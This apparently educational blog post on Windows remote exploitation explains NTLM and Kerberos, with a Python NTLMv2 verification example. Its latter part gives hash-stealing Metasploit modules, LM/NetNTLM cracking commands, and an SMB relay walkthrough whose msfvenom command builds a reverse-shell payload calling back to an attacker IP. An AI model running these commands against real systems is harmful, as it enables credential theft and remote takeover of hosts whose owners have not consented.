Windows Remote Exploitation

Introduction

In this blog post we will look at Windows remote exploitation techniques and approaches for engaging a target, along with examples of tool usage.

Some of these approaches were already covered in the Linux exploitation modules.

Low Hanging Fruits

We covered the low hanging fruit approaches in the Linux exploitation module; the approach is the same for Windows, so please have a look at that blog post.

Remote Exploitation of Windows Network

This is the process in which an attacker exploits listening services on the target network in order to gain access to the target system.

Windows Authentication

Windows uses two authentication protocols for client and server authentication: NTLM and Kerberos.

NTLM

NTLM (New Technology LAN Manager) is the authentication protocol used on networks that include Windows systems and on stand-alone systems.

How NTLM Works

  1. A user accesses a client computer and provides a domain name, user name, and password. The client computes a cryptographic hash of the password and discards the actual password.

  2. The client sends the username to the server to authenticate itself.

  3. The server generates a 16-byte random number, called a challenge or nonce, and sends it to the client.

  4. The client encrypts this challenge with the hash of the user’s password and sends the result to the server as its response.

  5. The server then sends the user name, the challenge it sent to the client and the response it received from the client to the domain controller (the authentication server).

  6. The domain controller uses the user name to retrieve the hash of the user’s password from the SAM (Security Account Manager) database. It uses this password hash to encrypt the challenge.

  7. The DC then compares the encrypted challenge it computed (step 6) to the response computed by the client (step 4). If they are identical, authentication succeeds for the client system.
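As an added example (not from the original post), here is the arithmetic behind steps 1, 4, 6 and 7, written from the domain controller's side: the stored NT hash is used to recompute the expected response and compare it with what the client sent. It uses the NTLMv2 variant (HMAC-MD5), which is what current Windows negotiates by default, rather than the DES-based NTLMv1 the steps describe literally; the user name, domain, challenge and client blob are constructed sample values, and MD4 is implemented inline because hashlib's md4 is often unavailable.

```python
import hashlib
import hmac
import struct

M32 = 0xFFFFFFFF
_R2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)  # MD4 round-2 word order
_R3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)  # MD4 round-3 word order

def _rotl(x, n):
    x &= M32
    return ((x << n) | (x >> (32 - n))) & M32

def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320) in pure Python; OpenSSL 3 builds of hashlib usually lack it."""
    bitlen = struct.pack("<Q", len(data) * 8)
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + bitlen  # pad to 56 mod 64, then length
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1, F = (b & c) | (~b & d)
            a = _rotl(a + ((b & c) | (~b & d)) + x[i], (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2, G = majority(b, c, d)
            a = _rotl(a + ((b & c) | (b & d) | (c & d)) + x[_R2[i]] + 0x5A827999, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3, H = b ^ c ^ d
            a = _rotl(a + (b ^ c ^ d) + x[_R3[i]] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & M32, (b + bb) & M32, (c + cc) & M32, (d + dd) & M32
    return struct.pack("<4I", a, b, c, d)

def nt_hash(password: str) -> bytes:
    """Step 1: MD4 over UTF-16LE(password). This value alone answers challenges, so it is password-equivalent."""
    return md4(password.encode("utf-16-le"))

def ntlmv2_proof(nt: bytes, user: str, domain: str, challenge: bytes, blob: bytes) -> bytes:
    """Step 4 (NTLMv2): key = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain)); proof = HMAC-MD5(key, challenge + blob)."""
    key = hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(key, challenge + blob, hashlib.md5).digest()

def dc_verify(stored_nt: bytes, user: str, domain: str, challenge: bytes, blob: bytes, proof: bytes) -> bool:
    """Steps 6-7: the DC recomputes the proof from the stored hash and compares in constant time."""
    expected = ntlmv2_proof(stored_nt, user, domain, challenge, blob)
    return hmac.compare_digest(expected, proof)

if __name__ == "__main__":
    chal, blob = bytes(range(8)), b"\x01\x01" + b"\x00" * 6 + b"constructed-blob"  # constructed sample values
    proof = ntlmv2_proof(nt_hash("password"), "alice", "CORP", chal, blob)          # what the client would send
    print(dc_verify(nt_hash("password"), "alice", "CORP", chal, blob, proof))      # True
```

Because the DC only ever needs the hash, a leaked NT hash is as good as the password to anyone who can reach an NTLM service; that is what the hash-stealing and relay tooling below relies on.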

Check For More About NTLM

LM/NT hashes Explanation

Kerberos

Windows domains use Kerberos as the underlying protocol for SSO. A user can log on to the domain at the beginning of the workday, and the system uses the same credentials to access any resource in the domain. Kerberos is also used by Unix systems nowadays.

How Kerberos Works

  1. A user logs on to a client computer, which sends an authentication request including the user’s login ID to the Kerberos server.

  2. The authentication server replies with an encrypted symmetric key and a time-stamped ticket-granting ticket (TGT).

  3. The client then sends a network authentication request including the TGT and the name of the target server, for example MS Active Directory.

  4. The Kerberos server replies with a session ticket for use with the target server.

  5. The client presents the time-stamped session ticket to the target server as its authentication.

  6. Finally, the target server provides authentication back to the client.

Authentication Successful!!

Check For More About Kerberos

Also have a look at Windows Security Identifiers (SIDs); they are important.

Some NTLM Stealing Metasploit Modules

auxiliary/admin/mssql/mssql_ntlm_stealer

Oracle SMB Relay Code Execution

auxiliary/admin/oracle/ora_ntlm_stealer

Host Information Enumeration via NTLM Authentication

auxiliary/scanner/http/ntlm_info_enumeration

SMTP NTLM Domain Extraction

auxiliary/scanner/smtp/smtp_ntlm_domain

WinRM Login Utility

This module attempts to authenticate to a WinRM service.

auxiliary/scanner/winrm/winrm_login

Cracking NTLM hashes

There are many techniques to crack NTLM hashes.

John hash formats

john --format=netlm hashpwd_netntlm

Using Rainbow Tables To Crack Hash

rcracki_mt

Download rainbow tables

[http://project-rainbowcrack.com/table.htm] [http://ophcrack.sourceforge.net/tables.php]

rcracki_mt -h 1f548398f0f49ea1 -t 4 *.rti

  • -h: the first 8 bytes of the LM hash
  • -t: the number of threads to use
  • *.rti: the path of the downloaded rainbow tables

Suppose you have found only half of the password

This happens because the LM hash is computed over two independent 7-character halves of the password, so a rainbow table hit on the first 8 bytes recovers only the first half. In /usr/share/metasploit-framework/tools/password (run ls there) there is also a tool for this purpose, halflm_second.rb, used as follows:

ruby halflm_second.rb -n 1f548398f0f49ea18e2f0dcb9562b75eaa32e75aebf1d69c -p HALFPSWD

To convert the result (which the LM hash stores in upper case) into the case-sensitive password:

perl netntlm.pl -file /root/hashpwd_netntlm -seed FULLHALFPSWD

SMBRelay Attack

It is a kind of man-in-the-middle attack in which the attacker relays SMB authentication requests to another host, gaining access to an authenticated SMB session if successful.

Metasploit Module for this purpose

msfconsole
use exploit/windows/smb/smb_relay
msf5 exploit(windows/smb/smb_relay) > info

Read about this module with the info command in Metasploit.

Another Exploit for SMBRelay, Click Here

You can also use Impacket’s smbrelayx.py for this purpose.

smbrelayx.py: Exploit for CVE-2015-0005 using an SMB Relay Attack. If the target system is enforcing signing and a machine account was provided, the module will try to gather the SMB session key through NETLOGON.

Use msfvenom to create a Windows reverse TCP .exe payload to use with smbrelayx.py:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<AttackerIP> LPORT=<Port> -f exe -o hacker.exe

Start a Metasploit multi/handler on the attacker machine (use exploit/multi/handler), set its options, and then run smbrelayx.py:

smbrelayx.py -h <TargetIP> -e /home/hacker.exe

To check for and use exploits for other Windows vulnerabilities

Run command below in msfconsole

show exploits windows

Conclusion

We have discussed basic exploitation of Windows systems, and some approaches were already covered in the previous phases; exploitation depends entirely on the earlier phases of the pentest.